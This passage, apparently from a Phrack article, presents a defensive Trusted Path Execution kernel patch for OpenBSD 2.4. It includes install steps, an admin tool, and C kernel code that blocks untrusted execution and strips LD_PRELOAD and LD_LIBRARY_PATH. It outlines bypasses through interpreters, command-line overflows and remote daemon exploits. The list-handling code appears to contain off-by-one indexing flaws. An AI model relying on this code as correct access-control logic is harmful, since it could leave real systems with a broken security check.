+There is a global int, tpe_ld_check, that is set, cleared and checked via
+the system call.  When set, ld.so checks the environment of any non UID 0
+process and calls unsetenv if LD_PRELOAD and/or LD_LIBRARY_PATH exist.  The
+variables still exist in the user's environment, but they are ignored
+during the dynamic linking.
+
+
+----[  What TPE will do
+
+Trusted path execution will prevent arbitrary users from executing arbitrary
+code.  This means that malicious users cannot execute exploit programs to
+try and break root on your machine.  This also means that they can't execute
+exploit programs and try to hack from your machine.  It affords an
+administrator an extra level of confidence that her system is secure.
+
+
+----[  What TPE will not do
+
+TPE relies on auditing a call to one of exec(2) family of functions.  It
+ensures that the program file that contains the code to be executed resides
+in a trusted directory or is being executed by a trusted user.  Programs
+living in a trusted directory that interpret symbolic code and link and
+assemble at runtime (and call exec from a trusted path) can bypass our
+TPE security mandate and must be audited differently.  These are programs
+such as perl, any of the shell interpreters, sed, awk, etc...  While a
+malicious user cannot just whip up a script in her home directory (it would be
+denied execution rights because it lives in an untrusted directory) she could
+specify the code on the command line or redirect it from a file.
+
+There are different ways to tackle this problem, none of them very elegant.
+Changing the file permissions and ownership to allow only members of a
+certain group access to these files is a simple effort and an obvious
+choice, but will not work for the shell interpreters.  Moving all of these
+programs to a special non-trusted directory would also work (normal users
+would not be able to execute them, but trusted users would), but again,
+this will not work for the shell programs.
+
+To prevent the shell programs from being to execute arbitrary code it seems
+like the only real solution would be to patch them.  This way you can prevent
+naughty activity and still get desired functionality.
+
+Another area of trouble is command line buffer overflows.  If a trusted
+program happens to contain a buffer overflow that is exploitable from the
+command line, an attacker can bypass the TPE and get arbitrary code executed.
+The overflow shellcode is passed in as standard command line argument and
+is not illegal as far as TPE sees.  One possible fix is to audit or sanitize
+the command arguments before granting execution rights.
+
+The other noteworthy issue regarding TPE is the fact that it generally does not
+protect the machine from remote attacks.  Daemons running as root or as a 
+trusted user id (usually the case -- otherwise how would it be started in the
+first place?) will be allowed execution rites.  If this code contains
+remotely exploitable buffer overflows, TPE cannot prevent arbitrary code
+execution.
+
+
+----[  tpe_adm
+
+The userland agent is painfully simple to use.  To show the kernel's trusted
+user list:
+
+    resentment:~# tpe_adm -s
+    trusted users: root diablerie
+
+To add a user to the list:
+
+    resentment:~# tpe_adm -a devilish
+    UID 1000 added to trust list
+    resentment:~# tpe_adm -s
+    trusted users: root diablerie devilish
+
+To remove a user from the list:
+
+    resentment:~# tpe_adm -d diablerie
+    UID 1000 removed from trust list
+    resentment:~# tpe_adm -s
+    trusted users: root diablerie
+
+To enable/disable ld.so environment checking:
+
+    resentment:~# tpe_adm -le
+    ld.so environment protection enabled
+    resentment:~# tpe_adm -ls
+    ld.so environment protection is currently on
+    resentment:~# tpe_adm -ld
+    ld.so environment protection disabled
+    resentment:~# tpe_adm -ls
+    ld.so environment protection is currently off
+
+
+----[  TPE Installation
+
+I.      Extract the code from this article:
+            1. extract P54-06
+            2. cd TPE/
+
+II.     Apply the kernel diffs:
+            1. cp Core/Patch/TPE-diff /usr/src/sys
+            2. cd /usr/src/sys/
+            3. patch < TPE-diff
+            4. note any errors.  hope they are benign.
+
+III.    Apply the ld.so diff:
+            1. cp Core/Patch/ld.so-diff /usr/src/
+            2. cd /usr/src/
+            3. patch < ld.so-diff
+
+IV.      Copy over the tpe core files:
+            1. cp Core/kern/kern_tpe.c /usr/src/sys/kern
+            2. cp Core/kern/kern_tpe_sys.c /usr/src/sys/kern
+            3. cp Core/sys/kern_tpe.h /usr/src/sys/sys
+
+V.      Rebuild your syscall table:
+            1. cd /usr/src/sys/kern
+            2. make
+
+VI.     Copy over the syscall include files:
+            1. cp /usr/src/sys/sys/syscall.h /usr/include/sys
+            2. cp /usr/src/sys/sys/syscallargs.h /usr/include/sys
+
+VII.    Reconfigure your kernel:
+        (This step assumes you have a previously configured kernel named
+         YOUR_KERNEL.  If you haven't, you need to config a kernel.  Refer
+         to OpenBSD documentation on how to do this.)
+            1. cd /usr/src/sys/arch/YOUR_ARCH/conf
+            2. config YOUR_KERNEL
+
+VIII.   Remake the dependencies and rebuild the kernel:
+            1. cd /usr/src/sys/arch/YOUR_ARCH/compile/YOUR_KERNEL
+            2. make depend ; make clean ; make
+            3. note any errors.  hope you can fix them.
+            3. cp /bsd /bsd.old ; cp bsd /
+            4. reboot
+
+IX.     Build the new ld.so
+            1. cd /usr/src
+            2. cp lib/libc/stdio/vfprintf.c /usr/src/gnu/usr.bin/ld/rtld
+            3. cp lib/libc/stdio/local.h /usr/src/gnu/usr.bin/ld/rtld
+            4. cp lib/libc/stdio/fvwrite.h /usr/src/gnu/usr.bin/ld/rtld
+            5. cd /usr/src/gnu/usr.bin/ld/rtld
+            6. make ; make install
+
+X.      Build the TPE admin program:
+            1. cd Core/Admin/ ; make
+            2. make install
+
+XI.     Test it out:
+            1. As root, dump the current trust list:
+               (Only UID 0 should be on it.)
+               tpe_adm -s
+               trusted users: root
+
+            2. Try the following as an untrusted user (i.e. UID=1000):
+               cat > foo.c << EOF ; gcc foo.c
+                 int main(int argc, char **argv){ printf("Hello world\n"); }
+                 EOF
+               ./a.out
+               EPERM should result.
+
+            3. Now add the user to the trust list:
+               tpe_adm -a UID
+
+            4. Dump the list again:
+               (You should see the user on the list.)
+               tpe_adm -s
+
+            5. Try to execute the command again as the user:
+               ./a.out
+               Hello world
+
+            6. Add only the necessary UIDs to the list.
+
+            7. NOTE TO QMAIL USERS:
+               You may find that you will need to explicitly add the qmailq
+               UID to the trust list.  Do this in an rc startup script that
+               runs before the qmail daemons start.
+
+            8. As root, ensure that ld.so environment protection is enabled:
+               tpe_adm -le
+               ld.so environment protection enabled
+
+            9. As an unprivileged user:
+               setenv LD_PRELOAD test.o
+               ls -l
+               Your environment contains illegal variables which are being
+               stripped out for the execution of this program
+               a.out  fo.c   foo.c
+
+           10. As root, ensure that ld.so environment protection is disabled:
+               tpe_adm -ld
+               ld.so environment protection disabled
+
+           11. As an unprivileged user:
+               ls
+               /usr/libexec/ld.so: preload: test.o: cannot map object     
+
+           12. You're done.  Pat yourself on the back and buy something from
+               Precious Roy.
+
+
+----[  The Code
+
+<++> TPE/Core/Admin/Makefile
+#   $Id: P54-06,v 1.16 1998/12/10 00:01:28 route Exp $
+#   Trusted path ACL implementation for OpenBSD 2.4
+#   Copyright (c) 1998 route|daemon9 and Mike D. Schiffman
+#   All rights reserved.
+#
+#   Originally published in Phrack Magazine (http://www.phrack.com).
+
+tpe_adm:
+	$(CC) tpe_adm.c -o tpe_adm
+
+install: tpe_adm
+	install -m 711 -o 0 tpe_adm /usr/local/sbin
+
+clean:
+	rm -rf core a.out tpe_adm
+
+# EOF
+<-->
+<++> TPE/Core/Admin/tpe_adm.c
+/*
+ *  $Id: P54-06,v 1.16 1998/12/10 00:01:28 route Exp $
+ *  Trusted path ACL userland administrative agent for OpenBSD 2.4
+ *
+ *  Copyright (c) 1998 route|daemon9 and Mike D. Schiffman
+ *  All rights reserved.
+ *  Originally published in Phrack Magazine (http://www.phrack.com).
+ *
+ *  Thanks to nirva for helping me choose an ADT.
+ *  See <sys/kern_tpe.h> for more info.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pwd.h>
+#include "../sys/kern_tpe.h"
+
+void usage();
+
+int
+main(int argc, char **argv)
+{
+    uid_t list[TPE_ACL_SIZE];
+    int c, i, mode;
+    uid_t candidate;
+    struct passwd *pwd;
+
+    if (geteuid() && getuid())
+    {
+        fprintf(stderr, "root access required\n");
+        exit(1);
+    }
+
+    if (argc == 1 || argc > 3)
+    {
+        usage();
+        exit(EXIT_SUCCESS);
+    }
+
+    while ((c = getopt(argc, argv, "a:d:l:s")) != EOF)
+    {
+        switch (c)
+        {
+            case 'a':
+                if (isalpha(optarg[0]))
+                {
+                    pwd = getpwnam(optarg);
+                    if(!pwd)
+                    {
+                        fprintf(stderr, "Unknown user: \"%s\"\n", optarg);
+                        exit(EXIT_FAILURE);
+                    }
+                    candidate = pwd->pw_uid;
+                }
+                else if (!(candidate = (uid_t)atol(optarg)))
+                {
+                    fprintf(stderr, "invalid UID: \"%s\"\n", optarg);
+                    exit(EXIT_FAILURE);
+                }
+                if (syscall(SYS_tpe_adm, TPE_ADD, candidate, NULL) == -1)
+                {
+                    printf("Full trust list\n");
+                    exit(EXIT_FAILURE);
+                }
+                printf("UID %d added to trust list\n", candidate);
+                break;
+            case 'd':
+                if (isalpha(optarg[0]))
+                {
+                    pwd = getpwnam(optarg);
+                    if(!pwd)
+                    {
+                        fprintf(stderr, "Unknown user: \"%s\"\n", optarg);
+                        exit(EXIT_FAILURE);
+                    }
+                    candidate = pwd->pw_uid;
+                }
+                else if (!(candidate = (uid_t)atol(optarg)))
+                {
+                    fprintf(stderr, "invalid UID: \"%s\"\n", optarg);
+                    exit(EXIT_FAILURE);
+                }
+                if (syscall(SYS_tpe_adm, TPE_REMOVE, candidate, NULL) == -1)
+                {
+                    printf("UID %d not found on trust list\n", candidate);
+                    exit(EXIT_FAILURE);
+                }
+                printf("UID %d removed from trust list\n", candidate);
+                break;
+            case 'l':
+                if (optarg[0] == 'e')
+                {
+                    if (syscall(SYS_tpe_adm, TPE_LDCHECK_E, -1, NULL) == -1)
+                    {
+                        printf("Unknown internal error\n"); /* should NOT fail */
+                        exit(EXIT_FAILURE);
+                    }
+                    printf("ld.so environment protection enabled\n");
+                }
+                else if (optarg[0] == 'd')
+                {
+                    if (syscall(SYS_tpe_adm, TPE_LDCHECK_D, -1, NULL) == -1)
+                    {
+                        printf("Unknown internal error\n"); /* should NOT fail */
+                        exit(EXIT_FAILURE);
+                    }
+                    printf("ld.so environment protection disabled\n");
+                }
+                else if (optarg[0] == 's')
+                {
+                    if (syscall(SYS_tpe_adm, TPE_LDCHECK_S, -1, list) == -1)
+                    {
+                        printf("Unknown internal error\n"); /* should NOT fail */
+                        exit(EXIT_FAILURE);
+                    }
+                    printf("ld.so environment protection is currently %s\n",
+                    list[0] ? "on" : "off");
+                }
+                else
+                {
+                    fprintf(stderr, "Huh?\n");
+                    exit(EXIT_FAILURE);
+                }
+                break;
+            case 's':
+                /*
+                 *  It is Very Important that `list` is an array of size
+                 *  TPE_ACL_SIZE.  The kernel expects this.  Failure to do
+                 *  so can result in a panic.  However, only root can issue
+                 *  the tpe_adm system call.
+                 */
+                if (syscall(SYS_tpe_adm, TPE_SHOW, -1, list) == -1)
+                {
+                    /*
+                     *  Should NOT fail.
+                     */
+                    printf("Hideous internal error\n");
+                    exit(EXIT_FAILURE);
+                }
+                printf("trusted users: ");
+                for (i = 0; list[i] != TPE_INITIALIZER; i++)
+                {
+                    pwd = getpwuid(list[i]);
+                    if (pwd)
+                    {
+                        printf("%s ", pwd->pw_name);
+                    }
+                    else
+                    {
+                        printf("%d ", (int)list[i]);
+                    }
+                }
+                printf("\n"); 
+                break;
+            default:
+                usage();
+                exit(EXIT_SUCCESS);
+        }
+    }
+    return (0);
+}
+
+
+void
+usage()
+{
+    fprintf(stderr, "usage: tpe_adm [-a UID]    Add a UID to the trust list\n"
+                                   "[-d UID]    Delete a UID from the list\n"
+                                   "[-l e|n]    Toggle LD_* usage\n"
+                                   "[-l s]      Show status of ld.so protection\n"
+                                   "[-s]        Show the current list\n");
+}
+<-->
+<++> TPE/Core/Patch/TPE-diff
+--- ./kern/init_main.c	Tue Sep 15 23:21:08 1998
++++ ../Core/kern/init_main.c	Sun Oct 18 12:26:24 1998
+@@ -80,6 +80,7 @@
+ 
+ #include <sys/syscall.h>
+ #include <sys/syscallargs.h>
++#include <sys/kern_tpe.h>
+ 
+ #include <ufs/ufs/quota.h>
+ 
+@@ -424,6 +425,16 @@
+ 	srandom((u_long)(rtv.tv_sec ^ rtv.tv_usec));
+ 
+ 	randompid = 1;
++
++        tpe_init();
++        printf("Trusted patch execution list initialized\n");
++        /*
++         *  root must be added hard at this point.  For safey's sake, the
++         *  userland agent can't do anything with UID 0 to prevent morons
++         *  from locking themselves out of their machines.
++         */
++        tpe_add(0);
++
+ 	/* The scheduler is an infinite loop. */
+ 	scheduler();
+ 	/* NOTREACHED */
+--- ./kern/syscalls.master	Thu Sep 17 13:54:04 1998
++++ ../Core/kern/syscalls.master	Sun Oct 18 12:35:59 1998
+@@ -479,7 +479,8 @@
+ 242	UNIMPL
+ 243	UNIMPL
+ 244	UNIMPL
+-245	UNIMPL
++245	STD             { int sys_tpe_adm(int mode, uid_t candidate, \
++                             uid_t *list); }
+ 246	UNIMPL
+ 247	UNIMPL
+ 248	UNIMPL
+--- ./kern/kern_exec.c	Thu Sep 24 11:49:31 1998
++++ ../Core/kern/kern_exec.c	Sun Oct 18 12:32:03 1998
+@@ -51,12 +51,16 @@
+ #include <sys/mman.h>
+ #include <sys/signalvar.h>
+ #include <sys/stat.h>
++#include <ufs/ufs/quota.h>
++#include <ufs/ufs/inode.h>
+ #ifdef SYSVSHM
+ #include <sys/shm.h>
+ #endif
+ 
+ #include <sys/syscallargs.h>
+-
++#include <sys/kern_tpe.h>
++#include <sys/systm.h>
++ 
+ #include <vm/vm.h>
+ #include <vm/vm_kern.h>
+ 
+@@ -93,6 +97,7 @@
+ 	struct exec_package *epp;
+ {
+ 	int error, i;
++        struct vattr at;
+ 	struct vnode *vp;
+ 	struct nameidata *ndp;
+ 	size_t resid;
+@@ -146,6 +151,30 @@
+ 	if (error)
+ 		goto bad2;
+ 	epp->ep_hdrvalid = epp->ep_hdrlen - resid;
++
++        /*
++         *  Get the file attributes of the parent directory that the
++         *  executable lives in.
++         */
++        if ((error = VOP_GETATTR(ndp->ni_dvp, &at, NULL, NULL)) != 0)
++        {
++            goto bad2;
++        }
++
++        /*
++         *  Trusted path check.
++         */
++        if (!TRUSTED_PATH(at))
++        {
++                /*
++                 *  Trusted user check.
++                 */
++                if (!TRUSTED_USER(p->p_ucred->cr_uid))
++                {
++                        error = EACCES;
++                        goto bad2;
++                }
++        }
+ 
+ 	/*
+ 	 * set up the vmcmds for creation of the process
+--- ./conf/files	Sun Sep 27 19:43:22 1998
++++ ../Core/conf/files	Sun Oct 18 12:40:28 1998
+@@ -209,6 +209,8 @@
+ file kern/kern_sysctl.c
+ file kern/kern_synch.c
+ file kern/kern_time.c
++file kern/kern_tpe.c
++file kern/kern_tpe_sys.c
+ file kern/kern_xxx.c
+ file kern/subr_autoconf.c
+ file kern/subr_disk.c
+<-->
+<++> TPE/Core/kern/kern_tpe.c
+/*
+ *  $Id: P54-06,v 1.16 1998/12/10 00:01:28 route Exp $
+ *  Trusted path ACL implementation for OpenBSD 2.4
+ *
+ *  Copyright (c) 1998 route|daemon9 and Mike D. Schiffman
+ *  All rights reserved.
+ *  Originally published in Phrack Magazine (http://www.phrack.com).
+ *
+ *  Thanks to nirva for helping me choose an ADT.
+ *  See <sys/kern_tpe.h> for more info.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#include <sys/kern_tpe.h>
+
+void
+tpe_init()
+{
+    memset(tpe_acl, TPE_INITIALIZER, sizeof(uid_t) * TPE_ACL_SIZE);
+    tpe_acl_candidates = 0;
+    tpe_ld_check = 1;
+#if (AUTO_ADD_ROOT)
+    tpe_acl[0] = 0;
+#endif
+}
+
+
+void
+tpe_show()
+{
+    int i;
+
+    printf("%d trusted users: ", tpe_acl_candidates);
+    for (i = 0; i < tpe_acl_candidates; i++)
+    {
+        printf("%d ", tpe_acl[i]);
+    }
+    printf("\n");
+}
+
+
+int
+tpe_add(uid_t candidate)
+{
+    if (tpe_acl_candidates == TPE_ACL_SIZE)
+    {
+        /*
+         *  Full list.
+         */
+        return (NACK);
+    }
+
+    /*
+     *  Don't add duplicates.
+     */
+    if ((tpe_search(candidate, 0, tpe_acl_candidates)) == NACK)
+    {
+	/*
+	 *	Add to the end of the list, then sort.
+	 */
+	tpe_acl_candidates++;
+	tpe_acl[tpe_acl_candidates] = candidate;
+	tpe_sort(0, tpe_acl_candidates);
+
+        printf("tpe: UID %d added to trust list\n", candidate);
+    }
+    else
+    {
+        printf("tpe: duplicate UID %d not added\n", candidate);
+    }
+    return (ACK);
+}
+
+
+int
+tpe_remove(uid_t candidate)
+{
+    int n;
+
+    if (tpe_acl_candidates == 0)
+    {
+        /*
+         *  Empty list.
+         */
+        return (NACK);
+    }			
+    if ((n = tpe_search(candidate, 0, tpe_acl_candidates)) != NACK)
+    {
+        /*
+         *  Remove the candidate (mark the slot as unused), resort the list.
+         */
+        tpe_acl[n] = TPE_INITIALIZER;
+        tpe_acl_candidates--;
+        tpe_sort(0, tpe_acl_candidates);
+
+        printf("tpe: UID %d removed from trust list\n", candidate);
+        return (ACK);
+    }
+    /*
+     *  Not found.
+     */
+    return (NACK);
+}
+
+
+int
+tpe_verify(uid_t candidate)
+{
+    if ((tpe_search(candidate, 0, tpe_acl_candidates)) != NACK)
+    {
+        return (ACK);
+    }
+    else
+    {
+        return (NACK);
+    }
+}
+
+
+void
+tpe_sort(int low, int high)
+{
+    int i, j, n;
+
+    /*
+     *  Standard insertion sort.
+     */	
+    for (i = low + 1; i <= high; i++)
+    {
+        COMPSWAP(tpe_acl[low], tpe_acl[i]);
+    }
+
+    for (i = low + 2; i <= high; i++)
+    {
+        j = i;
+        n = tpe_acl[i];
+        while (LESS(n, tpe_acl[j - 1]))
+        {
+            tpe_acl[j] = tpe_acl[j - 1];
+            j--;
+        }
+        tpe_acl[j] = n;
+    }
+}
+
+
+int
+tpe_search(uid_t candidate, int low, int high)
+{
+    int n;
+
+    /*
+     *  Standard binary search.  XXX - should be iterative.
+     */
+    n = (low + high) / 2;
+
+    if (low > high)
+    {
+        return (NACK);
+    }
+    if (candidate == tpe_acl[n])
+    {
+        return (n);
+    }
+    if (low == high)
+    {
+        return (NACK);
+    }
+    if (LESS(candidate, tpe_acl[n]))
+    {
+        return (tpe_search(candidate, low, n - 1));
+    }
+    else
+    {
+        return (tpe_search(candidate, n + 1, high));
+    }
+}
+
+/* EOF */
+<-->
+<++> TPE/Core/kern/kern_tpe_sys.c
+/*
+ *  $Id: P54-06,v 1.16 1998/12/10 00:01:28 route Exp $
+ *  Trusted path ACL syscall implementation for OpenBSD 2.4
+ *
+ *  Copyright (c) 1998 route|daemon9 and Mike D. Schiffman
+ *  All rights reserved.
+ *  Originally published in Phrack Magazine (http://www.phrack.com).
+ *
+ *  Thanks to nirva for helping me choose an ADT.
+ *  See <sys/kern_tpe.h> for more info.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#include <sys/kern_tpe.h>
+#include <sys/systm.h>
+
+#include <sys/mount.h>
+#include <sys/syscallargs.h>
+
+
+int
+sys_tpe_adm(p, v, retval)
+        struct proc *p;
+        void *v;
+        register_t *retval;
+{
+    struct sys_tpe_adm_args /* {
+        syscallarg(int) mode;
+        syscallarg(uid_t) candidate;
+        syscallarg(uid_t *) list;
+    } */ *uap = v;
+    register struct pcred *pc = p->p_cred;
+    register int i;
+    register uid_t *lp;
+
+    /*
+     *  The only thing a non root user can do is check the status of the
+     *  ld.so environment protection.  This is necessary because ld.so
+     *  runs without elevated privilidges and needs to check this.
+     */
+    if (suser(pc->pc_ucred, &p->p_acflag) && SCARG(uap, mode) != TPE_LDCHECK_S)
+    {
+         return (EPERM);
+    }
+
+    switch (SCARG(uap, mode))
+    {
+        case TPE_ADD:
+            if (tpe_add(SCARG(uap, candidate)) == ACK)
+            {
+                return (0);
+            }
+            else
+            {
+                return (ENOSPC);            /* Ugh.  Best we can do. */
+            }
+        case TPE_REMOVE:
+            if (tpe_remove(SCARG(uap, candidate)) == ACK)
+            {
+                return (0);
+            }
+            else
+            {
+                return (ENOSPC);            /* Ugh. */
+            }
+        case TPE_SHOW:
+            lp = SCARG(uap, list); 
+            if (lp == NULL)
+            {
+                return (ENOSPC);
+            }
+            else
+            {
+                for (i = 0; i < TPE_ACL_SIZE; i++)
+                {
+                    lp[i] = tpe_acl[i];
+                }
+                return (0);
+            }
+        case TPE_LDCHECK_E:
+            tpe_ld_check = 1;
+            return (0);
+        case TPE_LDCHECK_D:
+            tpe_ld_check = 0;
+            return (0);
+        case TPE_LDCHECK_S:
+            lp = SCARG(uap, list); 
+            if (lp == NULL)
+            {
+                return (ENOSPC);
+            }
+            else    /* XXX - sysctl would be cleaner. */
+            {
+                lp[0] = tpe_ld_check;
+                return (0);
+            }
+        default:
+            return (ENXIO);                 /* Ugh. */
+    }
+    return (ENXIO);
+}
+<-->
+<++> TPE/Core/sys/kern_tpe.h
+/*
+ *  $Id: P54-06,v 1.16 1998/12/10 00:01:28 route Exp $
+ *  Trusted path ACL implementation for OpenBSD 2.4
+ *
+ *  Copyright (c) 1998 route|daemon9 and Mike D. Schiffman
+ *  All rights reserved.
+ *  Originally published in Phrack Magazine (http://www.phrack.com).
+ *
+ *  Thanks to nirva for helping me choose an ADT.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *      Trusted path ACL implementation for OpenBSD 2.4
+ *
+ *      For the full write-up please see Phrack Magazine, issue 54, article 6
+ *      http://www.phrack.com
+ *
+ *      Overview:
+ *
+ *  A trusted path/ACL execution implementation for OpenBSD.  We consider
+ *  a path to be trusted if the parent directory is owned by root and is not
+ *  group or world writable.  We consider a user to be trusted if she is on
+ *  the kernels trust list.
+ *
+ *      Implementation details:
+ *
+ *  Inside the kern_exec function, we first check the path for trust, if that
+ *  fails, we then check the user's credentials to see if she is  able to run
+ *  binaries in an untrusted path.  Untrusted users are not allowed to execute
+ *  programs from untrusted pathes.
+ *
+ *  The decision was the made to use a static array to hold the trusted IDs
+ *  for both convienience and runtime efficiency.  We keep the list ordered
+ *  after all insertions and deletions, and therefore, we can search the list
+ *  (where speed is critical) in a worst case of O(lg N).  Compare that with a
+ *  sequential search in an ordered list which has a worst case of O(N).
+ * 	
+ *  The speed in which user ID verification is done is absolutely essential,
+ *  as this check will be done for every call to exec that does not originate
+ *  from a trusted path.  This has the potential to be a huge bottle neck.
+ *  This was taken into consideration and the bulk of processing overhead is
+ *  offloaded to list initialization and modification.
+ */
+
+#ifndef __KERN_TPE_H
+#define	__KERN_TPE_H
+
+#ifdef _KERNEL
+#include <sys/types.h>
+#include <sys/cdefs.h>
+#include <sys/systm.h>
+#include <sys/param.h>
+#include <sys/ucred.h>
+#include <sys/proc.h>
+#endif 
+
+/*
+ *  syscall stuff
+ */
+#define TPE_ADD         0       /* add an entry */
+#define TPE_REMOVE      1       /* delete an entry */
+#define TPE_SHOW        2       /* show the list */
+#define TPE_LDCHECK_E   3       /* enable ld.so environment checking */
+#define TPE_LDCHECK_D   4       /* disable ld.so environment checking */
+#define TPE_LDCHECK_S   5       /* show ld.so environment check status */
+
+#define TPE_ACL_SIZE    80      /* Shouldn't need to be larger */
+#define TPE_INITIALIZER	-1      /* A UID that isn't used */
+
+#define ACK             1       /* positive acknowledgement */
+#define NACK            -1      /* negative acknowledgement */
+
+#define LESS(X, Y)      (X < Y)
+#define SWAP(X, Y)      (X ^= Y, Y ^= X, X ^= Y)
+#define COMPSWAP(X, Y)  if (LESS(Y, X)) SWAP(X, Y)
+
+/*
+ *  Verify the path.  This macro is passed a filled in attr struct via
+ *  VOP_GETATTR.
+ */
+#define TRUSTED_PATH(AT) \
+(!(AT.va_mode & (S_IWGRP | S_IWOTH)) && (AT.va_uid == 0))
+
+/*
+ *  Verify the user.  This macro is passed the user's ID from the u_cred
+ *  struct.
+ */
+#define TRUSTED_USER(UID) (tpe_verify(UID) == ACK)
+
+uid_t tpe_acl[TPE_ACL_SIZE];    /* trusted user list */
+int tpe_acl_candidates;         /* number of users on the list */
+int tpe_ld_check;               /* check ld.so env */
+
+/*
+ *  Initialize the array with default values (TPE_INITIALIZER).
+ */
+void
+tpe_init __P((
+    void
+    ));
+
+
+/*
+ *  Dump the list.
+ */
+void
+tpe_show __P((
+    void
+    ));
+
+
+/*
+ *  Attempt to add a candidate to the list.  Only fails if the list is full.
+ */
+int
+tpe_add __P((
+    uid_t	/* candidate user for addition */
+    ));
+
+
+/*
+ *  Attempt to remove a candidate from the list.  Only fails if the entry is
+ *  not there.
+ */
+int
+tpe_remove __P((
+    uid_t       /* candidate user for deletion */
